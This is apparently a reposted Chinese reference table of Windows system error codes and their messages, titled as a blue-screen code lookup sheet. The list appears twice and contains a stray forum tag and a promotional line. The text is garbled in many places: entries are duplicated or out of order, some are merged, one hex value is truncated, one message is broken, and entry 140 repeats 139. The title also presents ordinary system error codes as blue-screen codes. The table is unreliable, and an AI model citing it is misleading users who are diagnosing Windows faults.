[color=Blue]0 0x0000 作业完成。
    1 0x0001 不正确的函数。
    2 0x0002 系统找不到指定的档案。
    3 0x0003 系统找不到指定的路径。
    4 0x0004 系统无法开启档案。
    5 0x0005 拒绝存取。
    6 0x0006 无效的代码。
    7 0x0007 储存体控制区块已毁。
    8 0x0008 储存体空间不足，无法处理这个指令。
    9 0x0009 储存体控制区块地址无效。
    10 0x000A 环境不正确。
    11 0x000B 尝试加载一个格式错误的程序。
    12 0x000C 存取码错误。
    13 0x000D 资料错误。
    14 0x000E 储存体空间不够，无法完成这项作业。
    15 0x000F 系统找不到指定的磁盘驱动器。
    16 0x0010 无法移除目录。
    16 0x0010 无法移除目录。
    17 0x0011 系统无法将档案移到 其它的磁盘驱动器。
    18 0x0012 没有任何档案。
    19 0x0013 储存媒体为写保护状态。
    20 0x0014 系统找不到指定的装置。
    21 0x0015 装置尚未就绪。
    22 0x0016 装置无法识别指令。
    23 0x0017 资料错误 (cyclic redundancy check)
    24 0x0018 程序发出一个长度错误的指令。
    25 0x0019 磁盘驱动器在磁盘找不到 持定的扇区或磁道。
    26 0x001A 指定的磁盘或磁盘无法存取。
    27 0x001B 磁盘驱动器找不到要求的扇区。
    28 0x001C 打印机没有纸。
    29 0x001D 系统无法将资料写入指定的磁盘驱动器。
    30 0x001E 系统无法读取指定的装置。
    31 0x001F 连接到系统的某个装置没有作用。
    32 0x0020 The process cannot access the file because it is being
    used by another process.
    33 0x0021 档案的一部份被锁定， 现在无法存取。
    34 0x0022 磁盘驱动器的磁盘不正确。 请将 %2 (Volume Serial
    Number: %3) 插入磁盘机%1。
36 0x0024 开启的分享档案数量太多。
    38 0x0026 到达档案结尾。
    39 0x0027 磁盘已满。
    50 0x0032 不支持这种网络要求。
    51 0x0033 远程计算机无法使用。
    52 0x0034 网络名称重复。
    53 0x0035 网络路径找不到。
    54 0x0036 网络忙碌中。
    55 0x0037 The specified network resource or device is no longer
    available.
    56 0x0038 The network BIOS command limit has been reached. 57
    0x0039 网络配接卡发生问题。
    58 0x003A 指定的服务器无法执行要求的作业。
    59 0x003B 网络发生意外错误。
    60 0x003C 远程配接卡不兼容。
    61 0x003D 打印机队列已满。
    62 0x003E 服务器的空间无法储存等候打印的档案。
    63 0x003F 等候打印的档案已经删除。
    64 0x0040 指定的网络名称无法使用。
    65 0x0041 拒绝存取网络。
    65 0x0041 拒绝存取网络。
    66 0x0042 网络资源类型错误。
    67 0x0043 网络名称找不到。
    68 0x0044 超过区域计算机网络配接卡的名称限制。
    69 0x0045 超过网络 BIOS 作业阶段的限制。
    70 0x0046 远程服务器已经暂停或者正在起始中。
    71 0x0047 由于联机数目已达上限，此时无法再联机到这台远程计算机。
    72 0x0048 指定的打印机或磁盘装置已经暂停作用。
    80 0x0050 档案已经存在。
    82 0x0052 无法建立目录或档案。
    83 0x0053 INT 2484 0x0054 处理这项要求的储存体无法使用。
    85 0x0055 近端装置名称已经在使用中。
    86 0x0056 指定的网络密码错误。
    87 0x0057 参数错误。
    88 0x0058 网络发生资料写入错误。
    89 0x0059 此时系统无法执行其它行程。
    100 0x0064 无法建立其它的系统 semaphore。
    101 0x0065 属于其它行程专用的 semaphore.
    102 0x0066 semaphore 已经设定，而且无法关闭。
103 0x0067 无法指定 semaphore 。
    104 0x0068 在岔断时间无法要求专用的 semaphore 。
    104 0x0068 在岔断时间无法要求专用的 semaphore 。
    105 0x0069 此 semaphore 先前的拥有权已经结束。
    106 0x006A 请将磁盘插入 %1。
    107 0x006B 因为代用的磁盘尚未插入，所以程序已经停止。
    108 0x006C 磁盘正在使用中或被锁定。
    109 0x006D Pipe 已经中止。
    110 0x006E 系统无法开启指定的 装置或档案。
    111 0x006F 档名太长。
    112 0x0070 磁盘空间不足。
    113 0x0071 没有可用的内部档案标识符。
    114 0x0072 目标内部档案标识符不正确。
    117 0x0075 由应用程序所执行的 IOCTL 呼叫 不正确。
    118 0x0076 写入验证参数值不正确。
    119 0x0077 系统不支持所要求的指令。
    120 0x0078 此项功能仅在 Win32 模式有效。
    121 0x0079 semaphore 超过逾时期间。
    122 0x007A 传到系统呼叫的资料区域 太小。
    123 0x007B 文件名、目录名称或储存体卷标语法错误。
    124 0x007C 系统呼叫层次不正确。
    125 0x007D 磁盘没有设定卷标。
    126 0x007E 找不到指定的模块。
    127 0x007F 找不到指定的程序。
    128 0x0080 没有子行程可供等待。
    128 0x0080 没有子行程可供等待。
    129 0x0081 %1 这个应用程序无法在 Win32 模式下执行。
    130 0x0082 Attempt to use a file handle to an open disk
    partition for an operation other than raw disk I/O.
    131 0x0083 尝试将档案指针移至档案开头之前。
    132 0x0084 无法在指定的装置或档案，设定档案指针。
    133 0x0085 JOIN 或 SUBST 指令 无法用于 内含事先结合过的磁盘驱动器。
    134 0x0086 尝试在已经结合的磁盘驱动器，使用 JOIN 或 SUBST 指令。
    135 0x0087 尝试在已经替换的磁盘驱动器，使 用 JOIN 或 SUBST 指令。
    136 0x0088 系统尝试删除 未连结过的磁盘驱动器的连结关系。
138 0x008A 系统尝试将磁盘驱动器结合到已经结合过之磁盘驱动器的目录。
    139 0x008B 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。
    140 0x008C 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。
    141 0x00 系统尝试将磁盘驱动器 SUBST 成已结合的磁盘驱动器 目录。
    142 0x008E 系统此刻无法执行 JOIN 或 SUBST。
    143 0x008F 系统无法将磁盘驱动器结合或替换同一磁盘驱动器下目录。
    144 0x0090 这个目录不是根目录的子目录。
    145 0x0091 目录仍有资料。
    146 0x0092 指定的路径已经被替换过。
    147 0x0093 资源不足，无法处理这项 指令。
    148 0x0094 指定的路径这时候无法使用。
    148 0x0094 指定的路径这时候无法使用。
    149 0x0095 尝试要结合或替换的磁盘驱动器目录，是已经替换过的的目标。
    150 0x0096 CONFIG.SYS 文件未指定系统追踪信息，或是追踪功能被取消。
    151 0x0097 指定的 semaphore事件 DosMuxSemWait 数目不正确。
    152 0x0098 DosMuxSemWait 没有执行；设定太多的 semaphore。
    153 0x0099 DosMuxSemWait 清单不正确。
    154 0x009A 您所输入的储存媒体标 元长度限制。
    155 0x009B 无法建立其它的执行绪。
    156 0x009C 接收行程拒绝接受信号。
    157 0x009D 区段已经被舍弃，无法被锁定。
    158 0x009E 区段已经解除锁定。
    159 0x009F 执行绪识别码的地址不正确。
    160 0x00A0 传到 DosExecPgm 的自变量字符串不正确。
    161 0x00A1 指定的路径不正确。
    162 0x00A2 信号等候处理。
    164 0x00A4 系统无法建立执行绪。
    167 0x00A7 无法锁定档案的部份范围。
    170 0x00AA 所要求的资源正在使用中。
    173 0x00AD 取消范围的锁定要求不明显。
    174 0x00AE 档案系统不支持自动变更锁定类型。
    180 0x00B4 系统发现不正确的区段号码。
    182 0x00B6 操作系统无法执行 %1。
    182 0x00B6 操作系统无法执行 %1。
    183 0x00B7 档案已存在，无法建立同一档案。
    186 0x00BA 传送的旗号错误。
    187 0x00BB 指定的系统旗号找不到。
    188 0x00BC 操作系统无法执行 %1。
    189 0x00BD 操作系统无法执行 %1。
    190 0x00BE 操作系统无法执行 %1。
191 0x00BF 无法在 Win32 模式下执行 %1。
    192 0x00C0 操作系统无法执行 %1。
    193 0x00C1 %1 不是正确的 Win32 应用程序。
    194 0x00C2 操作系统无法执行 %1。
    195 0x00C3 操作系统无法执行 %1。
    196 0x00C4 操作系统无法执行 这个应用程序。
    197 0x00C5 操作系统目前无法执行 这个应用程序。
    198 0x00C6 操作系统无法执行 %1。
    199 0x00C7 操作系统无法执行 这个应用程序。
    200 0x00C8 程序代码的区段不可以大于或等于 64KB。
    201 0x00C9 操作系统无法执行 %1。
    202 0x00CA 操作系统无法执行 %1。
    203 0x00CB 系统找不到输入的环境选项。\r
    205 0x00CD 在指令子目录下，没有任何行程有信号副处理程序。
    206 0x00CE 文件名称或扩展名太长。
    207 0x00CF ring 2 堆栈使用中。
    207 0x00CF ring 2 堆栈使用中。
    208 0x00D0 输入的通用档名字元 * 或 ? 不正确， 或指定太多的通用檔名字元。
    209 0x00D1 所传送的信号不正确。
    210 0x00D2 无法设定信号处理程序。
    212 0x00D4 区段被锁定，而且无法重新配置。
    214 0x00D6 附加到此程序或动态连结模块的动态连结模块太多。
    215 0x00D7 Can’t nest calls to LoadModule.
    230 0x00E6 The pipe state is invalid.
    231 0x00E7 所有的 pipe instances 都在忙碌中。
    232 0x00E8 The pipe is being closed.
    233 0x00E9 No process is on the other end of the pipe.
    234 0x00EA 有更多可用的资料。
    240 0x00F0 作业阶段被取消。
    254 0x00FE 指定的延伸属性名称无效。
    255 0x00FF 延伸的属性不一致。
    259 0x0103 没有可用的资料。
    266 0x010A 无法使用 Copy API。
    267 0x010B 目录名称错误。
275 0x0113 延伸属性不适用于缓冲区。
    276 0x0114 在外挂的档案系统上的延伸属性档案已经毁损。
    277 0x0115 延伸属性表格文件满。
    278 0x0116 指定的延伸属性代码无效。
    278 0x0116 指定的延伸属性代码无效。
    282 0x011A 外挂的这个档案系统不支持延伸属性。
    288 0x0120 意图释放不属于叫用者的 mutex。
    298 0x012A semaphore 传送次数过多。
    299 0x012B 只完成 Read/WriteProcessMemory 的部份要求。
    317 0x013D 系统找不到位于讯息文件 %2 中编号为 0x%1 的讯息。
    487 0x01E7 尝试存取无效的地址。
    534 0x0216 运算结果超过 32 位。
    535 0x0217 信道的另一端有一个行程在接送资料。
    536 0x0218 等候行程来开启信道的另一端。
    994 0x03E2 存取延伸的属性被拒。
    995 0x03E3 由于执行绪结束或应用程序要求，而异常终止 I/O 作业。
    996 0x03E4 重叠的 I/O 事件不是设定成通知状态。
    997 0x03E5 正在处理重叠的 I/O 作业。
    998 0x03E6 对内存位置的无效存取。
    999 0x03E7 执行 inpage 作业发生错误。
    1001 0x03E9 递归太深，堆栈满溢。
    1002 0x03EA 窗口无法用来传送讯息。
    1003 0x03EB 无法完成这项功能。
    1004 0x03EC 旗号无效。
    1005 0x03ED 储存媒体未含任何可辨识的档案系统。 请确定以加载所需
    的系统驱动程序，而且该储存媒体并未毁损。
    1006 0x03EE 储存该档案的外部媒体发出警告，表示该已开启档案已经无效。
    1007 0x03EF 所要求的作业无法在全屏幕模式下执行。
    1008 0x03F0 An attempt was made to reference a token that does
    not exist.
1009 0x03F1 组态系统登录数据库毁损。
    1010 0x03F2 组态系统登录机码无效。
    1011 0x03F3 无法开启组态系统登录机码。
    1012 0x03F4 无法读取组态系统登录机码。
    1013 0x03F5 无法写入组态系统登录机码。
    1014 0x03F6 系统登录数据库中的一个档案必须使用记录或其它备份还
    原。 已经还原成功。
    1015 0x03F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映
    对内存内容毁损、会是档案无法复原。
    1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录
    无法读入、写出或更新，其中的一个档案 内含系统登录在内存中的内容。
    1017 0x03F9 系统尝试将档案加载系统登录或将档案还原到系统登录中，
    但是，指定档案的格式不是系统登录文件的格式。
    1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
    1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
    1019 0x03FB 系统无法配置系统登录记录所需的空间。
    1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。
    1021 0x03FD 无法在临时机码下建立永久的子机码。
    1022 0x03FE 变更要求的通知完成，但信息 并未透过呼叫者的缓冲区传
    回。呼叫者现在需要自行列举档案，找出变更的地方。
    1051 0x041B 停止控制已经传送给其它服务 所依峙的一个服务。
    1052 0x041C 要求的控制对此服务无效
    1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录
    无法读入、写出或更新，其中的一个档案 内含系统登录在内存中的内容。
    1017 0x03F9 系统尝试将档案加载系统登录或将档案还原到系统登录中，
    但是，指定档案的格式不是系统登录文件的格式。
    1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
    1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
    1019 0x03FB 系统无法配置系统登录记录所需的空间。
    1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。
    1021 0x03FD 无法在临时机码下建立永久的子机码。
1022 0x03FE 变更要求的通知完成，但信息 并未透过呼叫者的缓冲区传
    回。呼叫者现在需要自行列举档案，找出变更的地方。
    1051 0x041B 停止控制已经传送给其它服务 所依峙的一个服务。
    1052 0x041C 要求的控制对此服务无效
    1052 0x041C 要求的控制对此服务无效
    1053 0x041D The service did not respond to the start or control
    request in a timely fashion. 1054 0x041E 无法建立服务的执行绪。
    1055 0x041F 服务数据库被锁定。
    1056 0x0420 这种服务已经在执行。
    1057 0x0421 帐户名称错误或者不存在。
    1058 0x0422 指定的服务暂停作用，无法激活。
    1059 0x0423 指定循环服务从属关系。
    1060 0x0424 指定的服务不是安装进来的服务。
    1061 0x0425 该服务项目此时无法接收控制讯息。
    1062 0x0426 服务尚未激活。
    1063 0x0427 无法联机到服务控制程序。
    1064 0x0428 处理控制要求时，发生意外状况。
    1065 0x0429 指定的数据库不存在。
    1066 0x042A 服务传回专属于服务的错误码。
    1067 0x042B The process terminated unexpectedly.
    1068 0x042C 从属服务或群组无法激活。
    1069 0x042D 因为登入失败，所以没有激活服务。
    1070 0x042E 在激活之后，服务在激活状态时当机。
    1071 0x042F 指定服务数据库锁定无效。
    1072 0x0430 指定的服务已经标示为删除。
    1073 0x0431 指定的服务已经存在。
    1074 0x0432 系统目前正以上一次执行成功的组态执行。
    1075 0x0433 从属服务不存在，或已经标示为删除。
1076 0x0434 目前的激活已经接受上一次执行成功的 控制设定。
    1077 0x0435 上一次激活之后，就没有再激活服务。
    1078 0x0436 指定的名称已经用于服务名称或服务显示 名称。
    1100 0x044C 已经到了磁带的最后。
    1101 0x044D 到了档案标示。
    1102 0x044E 遇到磁带的开头或分割区。
    1100 0x044C 已经到了磁带的最后。
    1101 0x044D 到了档案标示。
    1102 0x044E 遇到磁带的开头或分割区。
    1103 0x044F 到了档案组的结尾。
    1104 0x0450 磁带没有任何资料。
    1105 0x0451 磁带无法制作分割区。
    1106 0x0452 存取多重容体的新磁带时，发现目前 区块大小错误。
    1107 0x0453 加载磁带时，找不到磁带分割区信息。
    1108 0x0454 无法锁住储存媒体退带功能。
    1108 0x0454 无法锁住储存媒体退带功能。
    1109 0x0455 无法解除加载储存媒体。
    1110 0x0456 磁盘驱动器中的储存媒体已经变更。
    1111 0x0457 已经重设 I/O 总线。
    1112 0x0458 磁盘驱动器没有任何储存媒体。
    1113 0x0459 目标 multi-byte code page，没有对应 Unicode 字符。
    1114 0x045A 动态链接库 (DLL) 起始例程失败。
    1115 0x045B 系统正在关机。
    1116 0x045C 无法中止系统关机，因为没有关机的动作在进行中。
    1117 0x045D 因为 I/O 装置发生错误，所以无法执行要求。
1118 0x045E 序列装置起始失败，会取消加载序列驱动程序。
    1119 0x045F 无法开启装置。这个装置与其它装置共享岔断要求 (IRQ)。
    至少已经有一个使用同一IRQ 的其它装置已经开启。
    1120 0x0460 A serial I/O operation was completed by another
    write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)
    1121 0x0461 因为已经过了逾时时间，所以序列 I/O 作业完成。
    (IOCTL_SERIAL_XOFF_COUNTER 不是零。)
    1122 0x0462 在磁盘找不到任何的 ID 地址标示。
    1123 0x0463 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。
    1124 0x0464 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序无法识别的错误。
    1125 0x0465 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。
    1126 0x0466 存取硬盘失败，重试后也无法作业。
    1127 0x0467 存取硬盘失败，重试后也无法作业。
    1128 0x0468 存取硬盘时，必须重设磁盘控制卡，但是 连重设的动作也失败。
    1129 0x0469 到了磁带的最后。
    1130 0x046A 可用服务器储存空间不足，无法处理这项指令。
    1131 0x046B 发现潜在的死锁条件。
    1132 0x046C 指定的基本地址或档案位移没有适当 对齐。
    1140 0x0474 尝试变更系统电源状态，但其它的应用程序或驱动程序拒绝。
    1141 0x0475 系统 BIOS 无法变更系统电源状态。
    1150 0x047E 指定的程序需要新的 Windows 版本。
    1151 0x047F 指定的程序不是 Windows 或 MS-DOS 程序。
    1152 0x0480 指定的程序已经激活，无法再激活一次。
    1153 0x0481 指定的程序是为旧版的 Windows 所写的。
    1154 0x0482 执行此应用程序所需的链接库档案之一毁损。
    1155 0x0483 没有应用程序与此项作业的指定档案建立关联。
1156 0x0484 传送指令到应用程序发生错误。
    1157 0x0485 找不到执行此应用程序所需的链接库档案。
    1200 0x04B0 指定的装置名称无效。
    1201 0x04B1 装置现在虽然未联机，但是它是一个记忆联机。
    1202 0x04B2 尝试记忆已经记住的装置。
    1203 0x04B3 提供的网络路径找不到任何网络提供程序。
    1203 0x04B3 提供的网络路径找不到任何网络提供程序。
    1204 0x04B4 指定的网络提供程序名称错误。
    1205 0x04B5 无法开启网络联机设定文件。
    1206 0x04B6 网络联机设定文件坏掉。
    1207 0x04B7 无法列举非容器。
    1208 0x04B8 发生延伸的错误。
    1209 0x04B9 指定的群组名称错误。
    1210 0x04BA 指定的计算机名称错误。
    1211 0x04BB 指定的事件名称错误。
    1212 0x04BC 指定的网络名称错误。
    1213 0x04BD 指定的服务名称错误。
    1214 0x04BE 指定的网络名称错误。
    1215 0x04BF 指定的资源共享名称错误。
    1216 0x04C0 指定的密码错误。
    1217 0x04C1 指定的讯息名称错误。
    1218 0x04C2 指定的讯息目的地错误。
    1219 0x04C3 所提供的条件与现有的条件组发生冲突。
    1220 0x04C4 尝试与网络服务器联机，但是 与该服务器的联机已经太多。
    1221 0x04C5 其它网络计算机已经在使用这个工作群组或网域名称。


Windows蓝屏代码含意速查表

《一键清理系统垃圾》

Windows蓝屏代码含意速查表

            0 0x0000 作业完成。
            1 0x0001 不正确的函数。
            2 0x0002 系统找不到指定的档案。
            3 0x0003 系统找不到指定的路径。
            4 0x0004 系统无法开启档案。
            5 0x0005 拒绝存取。
            6 0x0006 无效的代码。
            7 0x0007 储存体控制区块已毁。
            8 0x0008 储存体空间不足，无法处理这个指令。
            9 0x0009 储存体控制区块地址无效。
            10 0x000A 环境不正确。
            11 0x000B 尝试加载一个格式错误的程序。
            12 0x000C 存取码错误。
            13 0x000D 资料错误。
            14 0x000E 储存体空间不够，无法完成这项作业。
            15 0x000F 系统找不到指定的磁盘驱动器。
            16 0x0010 无法移除目录。
            16 0x0010 无法移除目录。
            17 0x0011 系统无法将档案移到 其它的磁盘驱动器。
            18 0x0012 没有任何档案。
            19 0x0013 储存媒体为写保护状态。
            20 0x0014 系统找不到指定的装置。
            21 0x0015 装置尚未就绪。
            22 0x0016 装置无法识别指令。
            23 0x0017 资料错误 (cyclic redundancy check)
            24 0x0018 程序发出一个长度错误的指令。
            25 0x0019 磁盘驱动器在磁盘找不到 持定的扇区或磁道。
            26 0x001A 指定的磁盘或磁盘无法存取。
            27 0x001B 磁盘驱动器找不到要求的扇区。
            28 0x001C 打印机没有纸。
            29 0x001D 系统无法将资料写入指定的磁盘驱动器。
            30 0x001E 系统无法读取指定的装置。
            31 0x001F 连接到系统的某个装置没有作用。
            32 0x0020 The process cannot access the file because it is being
used by another process.
            33 0x0021 档案的一部份被锁定， 现在无法存取。
            34 0x0022 磁盘驱动器的磁盘不正确。 请将 %2 (Volume Serial
Number: %3) 插入磁盘机%1。
            36 0x0024 开启的分享档案数量太多。
            38 0x0026 到达档案结尾。
            39 0x0027 磁盘已满。
            50 0x0032 不支持这种网络要求。
            51 0x0033 远程计算机无法使用。
            52 0x0034 网络名称重复。
            53 0x0035 网络路径找不到。
            54 0x0036 网络忙碌中。
            55 0x0037 The specified network resource or device is no longer
available.
            56 0x0038 The network BIOS command limit has been reached. 57
0x0039 网络配接卡发生问题。
            58 0x003A 指定的服务器无法执行要求的作业。
            59 0x003B 网络发生意外错误。
            60 0x003C 远程配接卡不兼容。
            61 0x003D 打印机队列已满。
            62 0x003E 服务器的空间无法储存等候打印的档案。
            63 0x003F 等候打印的档案已经删除。
            64 0x0040 指定的网络名称无法使用。
            65 0x0041 拒绝存取网络。
            65 0x0041 拒绝存取网络。
            66 0x0042 网络资源类型错误。
            67 0x0043 网络名称找不到。
            68 0x0044 超过区域计算机网络配接卡的名称限制。
            69 0x0045 超过网络 BIOS 作业阶段的限制。
            70 0x0046 远程服务器已经暂停或者正在起始中。
            71 0x0047 由于联机数目已达上限，此时无法再联机到这台远程计算机。
            72 0x0048 指定的打印机或磁盘装置已经暂停作用。
            80 0x0050 档案已经存在。
            82 0x0052 无法建立目录或档案。
            83 0x0053 INT 2484 0x0054 处理这项要求的储存体无法使用。
            85 0x0055 近端装置名称已经在使用中。
            86 0x0056 指定的网络密码错误。
            87 0x0057 参数错误。
            88 0x0058 网络发生资料写入错误。
            89 0x0059 此时系统无法执行其它行程。
            100 0x0064 无法建立其它的系统 semaphore。 101 0x0065 属于其它行
程专用的 semaphore.
            102 0x0066 semaphore 已经设定，而且无法关闭。
            103 0x0067 无法指定 semaphore 。
            104 0x0068 在岔断时间无法要求专用的 semaphore 。
            104 0x0068 在岔断时间无法要求专用的 semaphore 。
            105 0x0069 此 semaphore 先前的拥有权已经结束。
            106 0x006A 请将磁盘插入 %1。
            107 0x006B 因为代用的磁盘尚未插入，所以程序已经停止。
            108 0x006C 磁盘正在使用中或被锁定。
            109 0x006D Pipe 已经中止。
            110 0x006E 系统无法开启指定的 装置或档案。
            111 0x006F 档名太长。
            112 0x0070 磁盘空间不足。
            113 0x0071 没有可用的内部档案标识符。
            114 0x0072 目标内部档案标识符不正确。
            117 0x0075 由应用程序所执行的 IOCTL 呼叫 不正确。
            118 0x0076 写入验证参数值不正确。
            119 0x0077 系统不支持所要求的指令。
            120 0x0078 此项功能仅在 Win32 模式有效。
            121 0x0079 semaphore 超过逾时期间。
            122 0x007A 传到系统呼叫的资料区域 太小。
            123 0x007B 文件名、目录名称或储存体卷标语法错误。
            124 0x007C 系统呼叫层次不正确。
            125 0x007D 磁盘没有设定卷标。
            126 0x007E 找不到指定的模块。
            127 0x007F 找不到指定的程序。
            128 0x0080 没有子行程可供等待。
            128 0x0080 没有子行程可供等待。
            129 0x0081 %1 这个应用程序无法在 Win32 模式下执行。
            130 0x0082 Attempt to use a file handle to an open disk
partition for an operation other than raw disk I/O.
            131 0x0083 尝试将档案指针移至档案开头之前。
            132 0x0084 无法在指定的装置或档案，设定档案指针。
            133 0x0085 JOIN 或 SUBST 指令 无法用于 内含事先结合过的磁盘驱动
器。
            134 0x0086 尝试在已经结合的磁盘驱动器，使用 JOIN 或 SUBST 指令。
            135 0x0087 尝试在已经替换的磁盘驱动器，使 用 JOIN 或 SUBST 指
令。
            136 0x0088 系统尝试删除 未连结过的磁盘驱动器的连结关系。
            138 0x008A 系统尝试将磁盘驱动器结合到已经结合过之磁盘驱动器的目
录。
            139 0x008B 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目
录。
            140 0x008C 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目
录。
            141 0x00 系统尝试将磁盘驱动器 SUBST 成已结合的磁盘驱动器 目录。
            142 0x008E 系统此刻无法执行 JOIN 或 SUBST。
            143 0x008F 系统无法将磁盘驱动器结合或替换同一磁盘驱动器下目录。
            144 0x0090 这个目录不是根目录的子目录。
            145 0x0091 目录仍有资料。
            146 0x0092 指定的路径已经被替换过。
            147 0x0093 资源不足，无法处理这项 指令。
            148 0x0094 指定的路径这时候无法使用。
            148 0x0094 指定的路径这时候无法使用。
            149 0x0095 尝试要结合或替换的磁盘驱动器目录，是已经替换过的的目
标。
            150 0x0096 CONFIG.SYS 文件未指定系统追踪信息，或是追踪功能被取
消。
            151 0x0097 指定的 semaphore事件 DosMuxSemWait 数目不正确。
            152 0x0098 DosMuxSemWait 没有执行；设定太多的 semaphore。
            153 0x0099 DosMuxSemWait 清单不正确。
            154 0x009A 您所输入的储存媒体标 元长度限制。
            155 0x009B 无法建立其它的执行绪。
            156 0x009C 接收行程拒绝接受信号。
            157 0x009D 区段已经被舍弃，无法被锁定。
            158 0x009E 区段已经解除锁定。
            159 0x009F 执行绪识别码的地址不正确。
            160 0x00A0 传到 DosExecPgm 的自变量字符串不正确。
            161 0x00A1 指定的路径不正确。
            162 0x00A2 信号等候处理。
            164 0x00A4 系统无法建立执行绪。
            167 0x00A7 无法锁定档案的部份范围。
            170 0x00AA 所要求的资源正在使用中。
            173 0x00AD 取消范围的锁定要求不明显。
            174 0x00AE 档案系统不支持自动变更锁定类型。
            180 0x00B4 系统发现不正确的区段号码。
            182 0x00B6 操作系统无法执行 %1。
            182 0x00B6 操作系统无法执行 %1。
            183 0x00B7 档案已存在，无法建立同一档案。
            186 0x00BA 传送的旗号错误。
            187 0x00BB 指定的系统旗号找不到。
            188 0x00BC 操作系统无法执行 %1。
            189 0x00BD 操作系统无法执行 %1。
            190 0x00BE 操作系统无法执行 %1。
            191 0x00BF 无法在 Win32 模式下执行 %1。
            192 0x00C0 操作系统无法执行 %1。
            193 0x00C1 %1 不是正确的 Win32 应用程序。
            194 0x00C2 操作系统无法执行 %1。
            195 0x00C3 操作系统无法执行 %1。
            196 0x00C4 操作系统无法执行 这个应用程序。
            197 0x00C5 操作系统目前无法执行 这个应用程序。
            198 0x00C6 操作系统无法执行 %1。
            199 0x00C7 操作系统无法执行 这个应用程序。
            200 0x00C8 程序代码的区段不可以大于或等于 64KB。
            201 0x00C9 操作系统无法执行 %1。
            202 0x00CA 操作系统无法执行 %1。
            203 0x00CB 系统找不到输入的环境选项。\r
            205 0x00CD 在指令子目录下，没有任何行程有信号副处理程序。
            206 0x00CE 文件名称或扩展名太长。
            207 0x00CF ring 2 堆栈使用中。
            207 0x00CF ring 2 堆栈使用中。
            208 0x00D0 输入的通用档名字元 * 或 ? 不正确， 或指定太多的通用檔
名字元。
            209 0x00D1 所传送的信号不正确。
            210 0x00D2 无法设定信号处理程序。
            212 0x00D4 区段被锁定，而且无法重新配置。
            214 0x00D6 附加到此程序或动态连结模块的动态连结模块太多。
            215 0x00D7 Can’t nest calls to LoadModule.
            230 0x00E6 The pipe state is invalid.
            231 0x00E7 所有的 pipe instances 都在忙碌中。
            232 0x00E8 The pipe is being closed.
            233 0x00E9 No process is on the other end of the pipe.
            234 0x00EA 有更多可用的资料。
            240 0x00F0 作业阶段被取消。
            254 0x00FE 指定的延伸属性名称无效。
            255 0x00FF 延伸的属性不一致。
            259 0x0103 没有可用的资料。
            266 0x010A 无法使用 Copy API。
            267 0x010B 目录名称错误。
            275 0x0113 延伸属性不适用于缓冲区。
            276 0x0114 在外挂的档案系统上的延伸属性档案已经毁损。
            277 0x0115 延伸属性表格文件满。
            278 0x0116 指定的延伸属性代码无效。
            278 0x0116 指定的延伸属性代码无效。
            282 0x011A 外挂的这个档案系统不支持延伸属性。
            288 0x0120 意图释放不属于叫用者的 mutex。
            298 0x012A semaphore 传送次数过多。
            299 0x012B 只完成 Read/WriteProcessMemory 的部份要求。
            317 0x013D 系统找不到位于讯息文件 %2 中编号为 0x%1 的讯息。
            487 0x01E7 尝试存取无效的地址。
            534 0x0216 运算结果超过 32 位。
            535 0x0217 信道的另一端有一个行程在接送资料。
            536 0x0218 等候行程来开启信道的另一端。
            994 0x03E2 存取延伸的属性被拒。
            995 0x03E3 由于执行绪结束或应用程序要求，而异常终止 I/O 作业。
            996 0x03E4 重叠的 I/O 事件不是设定成通知状态。
            997 0x03E5 正在处理重叠的 I/O 作业。
            998 0x03E6 对内存位置的无效存取。
            999 0x03E7 执行 inpage 作业发生错误。
            1001 0x03E9 递归太深，堆栈满溢。
            1002 0x03EA 窗口无法用来传送讯息。
            1003 0x03EB 无法完成这项功能。
            1004 0x03EC 旗号无效。
            1005 0x03ED 储存媒体未含任何可辨识的档案系统。 请确定以加载所需
的系统驱动程序，而且该储存媒体并未毁损。
            1006 0x03EE 储存该档案的外部媒体发出警告，表示该已开启档案已经无
效。
            1007 0x03EF 所要求的作业无法在全屏幕模式下执行。
            1008 0x03F0 An attempt was made to reference a token that does
not exist.
            1009 0x03F1 组态系统登录数据库毁损。
            1010 0x03F2 组态系统登录机码无效。
            1011 0x03F3 无法开启组态系统登录机码。
            1012 0x03F4 无法读取组态系统登录机码。
            1013 0x03F5 无法写入组态系统登录机码。
            1014 0x03F6 系统登录数据库中的一个档案必须使用记录或其它备份还
原。 已经还原成功。
            1015 0x03F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映
对内存内容毁损、会是档案无法复原。
            1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录
无法读入、写出或更新，其中的一个档案 内含系统登录在内存中的内容。
            1017 0x03F9 系统尝试将档案加载系统登录或将档案还原到系统登录中，
但是，指定档案的格式不是系统登录文件的格式。
            1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
            1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
            1019 0x03FB 系统无法配置系统登录记录所需的空间。
            1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。
            1021 0x03FD 无法在临时机码下建立永久的子机码。
            1022 0x03FE 变更要求的通知完成，但信息 并未透过呼叫者的缓冲区传
回。呼叫者现在需要自行列举档案，找出变更的地方。
            1051 0x041B 停止控制已经传送给其它服务 所依峙的一个服务。
            1052 0x041C 要求的控制对此服务无效
            1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录
无法读入、写出或更新，其中的一个档案 内含系统登录在内存中的内容。
            1017 0x03F9 系统尝试将档案加载系统登录或将档案还原到系统登录中，
但是，指定档案的格式不是系统登录文件的格式。
            1018 0x03FA 尝试在标示为删除的系统登录机码，执行不合法的操作。
